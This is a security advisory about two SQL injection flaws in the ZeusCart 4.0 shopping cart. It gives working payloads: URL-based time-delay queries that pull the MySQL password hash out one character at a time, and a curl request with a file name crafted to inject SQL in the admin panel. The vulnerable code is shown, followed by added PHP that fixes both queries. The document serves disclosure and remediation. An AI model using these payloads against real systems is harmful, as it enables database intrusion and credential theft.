ZeusCart v4.0 /classes/Core/CFeaturedItems.php SQL注入

2015-09-19T00:00:00
ID SSV:89481
Type seebug
Reporter F001
Modified 2015-09-19T00:00:00

Description

ZeusCart 4.0: SQL Injection

1. Vulnerability description

ZeusCart 4.0 contains two SQL injection vulnerabilities. The first is exploitable without any precondition (no authentication required); the second is in the admin back end and requires an admin session.

Most parameters rely on simple, generic filtering rather than on proper query parameterization, so any gap in that filtering turns directly into an injection.

2a. Timing-based blind SQL injection

Proof of concept (the payload is appended to the maincatid parameter):

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)
-> true (the response is delayed)

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)
-> false (no delay)

Quotes cannot be used in the payload because they are filtered out. That does not matter here: the injection sits in a numeric context, so the whole expression is built from bare function calls and integer literals.

Retrieving the MySQL password hash through the timing oracle, one character at a time:

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(ascii(substring((SELECT password from mysql.user limit 0,1),1,1))=42,BENCHMARK(500000000,version()),null)
-> true: the password hash starts with * (ASCII 42)

The injection point is the $maincatid parameter in /classes/Core/CFeaturedItems.php.

Code

    /classes/Core/CFeaturedItems.php:52
        $maincatid = $_GET['maincatid']; // no further filtering or casting here
    [...]
        $sql = "SELECT DISTINCT a.category_name AS
    Category,a.category_id AS maincatid, b.category_name AS SubCategory,
    b.category_id as subcatid, b.category_image AS image FROM category_table
    a INNER JOIN category_table b ON a.category_id = b.category_parent_id
    WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";

2b. Injection in the admin back end (requires admin privileges)

All GET, POST and REQUEST parameters are passed through filter_var() as the defense against SQL injection and XSS, but for most queries no further, query-specific validation is done. The uploaded file name comes from $_FILES, which that filtering does not cover at all, and it is interpolated unescaped into the UPDATE and INSERT statements below.

    1. Log in as admin.
    2. Create a new product, using a file name for ufile[0] like:
       image.jpgblla', description=(SELECT password FROM mysql.user limit 0,1), image='test
    3. Visit
       http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID
       and the product page shows the result of the injected query (PRODUCTID is the id of the product just created).

Curl command to create a new product (replace the PHPSESSID cookie with a valid admin session):

    curl -i -s -k  -X 'POST' \
        -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type: multipart/form-data; boundary=--------2025782171' \
        -b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \
        --data-binary $'----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\', description=(SELECT password FROM mysql.user limit 0,1), image=\'test\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \
        'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

Code

    CProductEntry.php:313
        $imgfilename = $_FILES['ufile']['name'][$i];   // client-controlled, not filtered

        $imagefilename = date("Y-m-d-His").$imgfilename; // generates a new name, e.g. 2015-09-18-120000image.jpgblla

        $image = "images/products/".$imagefilename;       // written into the DB
    [...]

        if($i==0)
        {
            $imgType='main';
            $update="UPDATE products_table set
    image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where
    product_id='".$product_id."'";
            $obj->updateQuery($update);
        }
        else
        {
            $imgType='sub';
        }

        if($_FILES['ufile']['name'][$i]!='')
        {
            $query_img="INSERT INTO
    product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)
    VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";

            $obj_img=new Bin_Query();

            $obj_img->updateQuery($query_img);
        }

    }
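The following is an added example, not ZeusCart code, showing hardened versions of both queries from this advisory (the showmaincatlanding lookup from 2a and the product image upload from 2b). It assumes a mysqli connection in $db with mysqlnd (for get_result()); the table and column names are those shown above, while the thumb/large image paths and the strip_quotes() stand-in for the application's quote filter are assumptions.

```php
<?php
// Added example, not ZeusCart code: hardened versions of the two queries in
// this advisory. $db is an assumed mysqli connection; table and column names
// are the ones the advisory shows, everything else (thumb/large paths) is assumed.

declare(strict_types=1);

// ---- 2a: showmaincatlanding -------------------------------------------------

// Stand-in for the quote filter the advisory describes: removes ' and " only.
// The BENCHMARK payload is a bare numeric expression, so it passes untouched.
function strip_quotes(string $value): string
{
    return str_replace(["'", '"'], '', $value);
}

function subcategory_sql(string $parentExpr): string
{
    return 'SELECT DISTINCT a.category_name AS Category, a.category_id AS maincatid,'
        . ' b.category_name AS SubCategory, b.category_id AS subcatid,'
        . ' b.category_image AS image'
        . ' FROM category_table a INNER JOIN category_table b'
        . ' ON a.category_id = b.category_parent_id'
        . ' WHERE b.category_parent_id=' . $parentExpr . ' AND b.category_status=1';
}

// Vulnerable shape from CFeaturedItems.php: the value is concatenated into WHERE.
function vulnerable_subcategory_sql(string $maincatid): string
{
    return subcategory_sql(strip_quotes($maincatid));
}

// Hardened: maincatid is an id, so reject anything that is not a non-negative
// integer, then bind it as an integer. There is no character list to maintain.
function fetch_subcategories(mysqli $db, string $rawMaincatid): array
{
    $maincatid = filter_var($rawMaincatid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($maincatid === false) {
        throw new InvalidArgumentException('maincatid must be a non-negative integer');
    }
    $stmt = $db->prepare(subcategory_sql('?'));
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $maincatid);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // needs mysqlnd
    $stmt->close();
    return $rows;
}

// ---- 2b: product image upload ------------------------------------------------

// filter_var() over $_GET/$_POST/$_REQUEST never sees $_FILES[...]['name'].
// Instead of trusting the client name at all, keep only a whitelisted
// extension and generate the stored name server-side.
function safe_image_filename(string $clientName): string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        throw new InvalidArgumentException('unsupported image type');
    }
    return date('Y-m-d-His') . '-' . bin2hex(random_bytes(8)) . '.' . $ext;
}

// $file is one entry of $_FILES['ufile'] re-keyed per index: name, tmp_name, error.
function store_product_image(mysqli $db, int $productId, int $index, array $file): void
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }
    $name  = safe_image_filename($file['name']);
    $image = 'images/products/' . $name;
    $thumb = 'images/products/thumb/' . $name;   // assumed layout
    $large = 'images/products/large/' . $name;   // assumed layout
    // move_uploaded_file() and resizing omitted; the point here is the SQL.

    if ($index === 0) {
        $stmt = $db->prepare('UPDATE products_table SET image=?, thumb_image=?, large_image_path=? WHERE product_id=?');
        $stmt->bind_param('sssi', $image, $thumb, $large, $productId);
        $stmt->execute();
        $stmt->close();
    }
    $type = $index === 0 ? 'main' : 'sub';
    $stmt = $db->prepare('INSERT INTO product_images_table(product_id,image_path,thumb_image_path,type,large_image_path) VALUES(?,?,?,?,?)');
    $stmt->bind_param('issss', $productId, $image, $thumb, $type, $large);
    $stmt->execute();
    $stmt->close();
}

// Demonstration of the 2a point only (needs no database): the quote filter
// leaves the advisory's quoteless payload intact and it lands verbatim in WHERE.
echo vulnerable_subcategory_sql('-1 AND IF(SUBSTRING(version(),1,1)=5,BENCHMARK(500000000,version()),null)'), PHP_EOL;
```

Run against the advisory's own inputs: fetch_subcategories() throws before any SQL is sent because the BENCHMARK payload is not an integer, and safe_image_filename() rejects the "image.jpgblla', description=(...), image='test" name because its extension (everything after the last dot, here part of "mysql.user limit 0,1), image='test") is not on the whitelist. Even if a crafted name did pass the whitelist, the stored path is generated server-side and bound as a string parameter, so nothing from the client name can alter the statement.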